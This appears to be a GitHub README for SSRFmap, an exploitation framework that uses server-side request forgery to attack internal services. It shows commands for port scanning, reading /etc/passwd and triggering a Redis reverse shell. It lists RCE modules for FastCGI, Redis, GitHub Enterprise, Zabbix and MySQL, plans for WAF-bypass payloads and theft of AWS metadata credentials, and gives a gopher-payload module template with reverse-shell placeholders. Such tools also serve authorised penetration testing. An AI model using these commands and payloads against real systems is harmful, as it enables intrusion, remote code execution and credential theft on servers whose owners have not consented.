ed066d4622
|
||
|---|---|---|
| core | ||
| data | ||
| modules | ||
| screenshot | ||
| .gitignore | ||
| LICENSE | ||
| README.md | ||
| ssrfmap.py | ||
README.md
SSRFmap
SSRF are often used to leverage actions on other services, this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.
Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.
Guide / RTFM
usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST]
[--lport LPORT]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverse shell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
The default way to use this script is the following.
# Launch a portscan on localhost and read default files
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
# Triggering a reverse shell on a Redis
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
# -l create a listener for reverse shell on the specified port
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
A quick way to test the framework can be done with data/example.py SSRF service.
FLASK_APP=data/example.py flask run &
python ssrfmap.py -r data/request.txt -p url -m readfiles
Modules
The following modules are already implemented and can be used with the -m argument.
| Name | Description |
|---|---|
fastcgi |
FastCGI RCE |
redis |
Redis RCE |
github |
Github Enterprise RCE < 2.8.7 |
zaddix |
Zaddix RCE |
mysql |
MySQL Command execution |
smtp |
SMTP send mail |
portscan |
Scan ports for the host |
networkscan |
HTTP Ping sweep over the network |
readfiles |
Read files such as /etc/passwd |
Contribute
I <3 pull requests :) Feel free to add any feature listed below or a new service.
- --level arg - ability to tweak payloads in order to bypass some IDS/WAF. E.g:
127.0.0.1 -> [::] -> 0000: -> ... - aws and other cloud providers - extract sensitive data from http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy and more
- sockserver - SSRF SOCK proxy server - https://github.com/iamultra/ssrfsocks
- handle request with file in requester
The following code is a template if you wish to add a module interacting with a service.
from core.utils import *
import logging
name = "servicename in lowercase"
description = "ServiceName RCE - What does it do"
author = "Name or pseudo of the author"
class exploit():
def __init__(self, requester, args):
logging.info("Module '{}' launched !".format(name))
# Data for the service
ip = "127.0.0.1"
port = "6379"
data = "*1%0d%0a$8%0d%0af[...]save%0d%0aquit%0d%0a"
payload = wrapper_gopher(data, ip , port)
# Handle args for reverse shell
if args.lhost == None: payload = payload.replace("SERVER_HOST", input("Server Host:"))
else: payload = payload.replace("SERVER_HOST", args.lhost)
if args.lport == None: payload = payload.replace("SERVER_PORT", input("Server Port:"))
else: payload = payload.replace("SERVER_PORT", args.lport)
# Send the payload
r = requester.do_request(args.param, payload)
You can also contribute with a beer IRL or with buymeacoffee.com
Thanks to the contributors
- ???